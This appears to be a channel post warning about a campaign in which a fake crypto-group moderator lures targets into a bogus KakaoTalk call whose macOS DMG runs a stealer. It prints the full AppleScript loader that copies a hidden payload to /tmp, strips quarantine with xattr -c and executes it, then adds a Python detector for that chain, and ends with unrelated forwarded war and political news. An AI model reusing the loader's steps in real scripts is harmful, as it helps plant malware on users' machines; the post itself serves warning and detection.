Another distribution campaign.
@evabeylin (#5817609036), listed as a moderator/admin of the Graph Protocol chat group, is looking for projects that need investment.
She starts a conversation, chats, and invites the target to a call using the link http://kakao.us.com/?join=4AT3IL (the link now leads to https://jprs.co.jp/en/).
The page offers an app to download for the call.
For OSX it is a DMG file with a size of 742KB.
Inside is a shell script that you are asked to drag and drop into Terminal.
Running it installs the stealer.
The loader is:
```bash
#!/bin/bash
osascript -e 'on run
    try
        set diskList to list disks
    end try
    set targetDisk to ""
    try
        repeat with disk in diskList
            if disk contains "KakaoTalk" then
                set targetDisk to disk
                exit repeat
            end if
        end repeat
    end try
    if targetDisk is "" then
        return
    end if
    set folderPath to "/Volumes/" & targetDisk & "/"
    set appName to ".KakaoTalk"
    set appPath to folderPath & appName
    set tempAppPath to "/tmp/" & appName
    try
        do shell script "rm -f " & quoted form of tempAppPath
    end try
    try
        do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
    end try
    try
        do shell script "xattr -c " & quoted form of tempAppPath
    end try
    try
        do shell script "chmod +x " & quoted form of tempAppPath
    end try
    try
        do shell script quoted form of tempAppPath
    end try
end run'
```
Stealer on VirusTotal: https://www.virustotal.com/gui/file/76702b651e19ab338d0a877e84fcec950c022f5c892e77f9c6e7dbd45a6fae0e
They also targeted Linux and Windows.
Stranger, be careful: a contact having admin status in some groups does not guarantee security.
Update: Graph Protocol just removed the mention of @evabeylin from posts.
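For defenders, an added example (not part of the original post): a Python triage function that flags a script shipped inside a DMG when it performs the same steps as the loader above, namely a hidden payload on the mounted volume staged into /tmp, then `xattr -c`, then `chmod +x`. The rule names, verdict labels and both sample scripts are constructed for illustration.

```python
import re

# (finding name, pattern). Names are labels invented for this example;
# the patterns mirror the steps of the loader quoted in the post.
RULES = [
    ("inline_osascript", re.compile(r"\bosascript\s+-e\b")),
    ("do_shell_script", re.compile(r"\bdo shell script\b")),
    ("reads_mounted_volume", re.compile(r"/Volumes/")),
    ("hidden_payload_name", re.compile(r'to\s+"\.[\w.-]+"')),
    ("stages_in_tmp", re.compile(r"/tmp/")),
    # xattr -c clears every extended attribute, including
    # com.apple.quarantine, so Gatekeeper never evaluates the staged file.
    ("clears_xattrs", re.compile(
        r"\bxattr\s+-(?:[rsv]*c[rsv]*|[rsv]*d[rsv]*\s+com\.apple\.quarantine)\b")),
    ("marks_executable", re.compile(r"\bchmod\s+(?:[ua]?\+x|7[0-7]{2})\b")),
]

# The order that turns a copied file into a runnable, unquarantined one.
CHAIN = ["stages_in_tmp", "clears_xattrs", "marks_executable"]

def triage(script: str) -> dict:
    """Return matched findings and a verdict: 'block', 'review' or 'ok'."""
    hits = {name: m.start() for name, rx in RULES if (m := rx.search(script))}
    pos = [hits.get(name) for name in CHAIN]
    chain_in_order = None not in pos and pos == sorted(pos)
    if chain_in_order and "hidden_payload_name" in hits:
        verdict = "block"      # full stage / strip / chmod sequence on a dot-file
    elif "clears_xattrs" in hits:
        verdict = "review"     # quarantine removal alone still needs a human look
    else:
        verdict = "ok"
    return {"verdict": verdict, "findings": sorted(hits)}

# Constructed sample with the loader's structure and placeholder names.
SAMPLE_LOADER = '''#!/bin/bash
osascript -e 'on run
set appName to ".ExampleCall"
set appPath to "/Volumes/ExampleCall/" & appName
set tempAppPath to "/tmp/" & appName
do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
do shell script "xattr -c " & quoted form of tempAppPath
do shell script "chmod +x " & quoted form of tempAppPath
do shell script quoted form of tempAppPath
end run'
'''
# Constructed benign installer: chmod +x alone must not raise a verdict.
SAMPLE_BENIGN = "#!/bin/bash\ncp ./tool /usr/local/bin/tool\nchmod +x /usr/local/bin/tool\n"

if __name__ == "__main__":
    for label, text in (("loader-like", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)):
        print(label, triage(text))
```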
Forwarded from infinityhedge
IDF: IRAN LAUNCHED BALLISTIC MISSILES TOWARDS ISRAEL
Knock-knock, did you already forget all the shitty news about Trump and Musk? Didn't you? What did POTUS usually do after epic failures?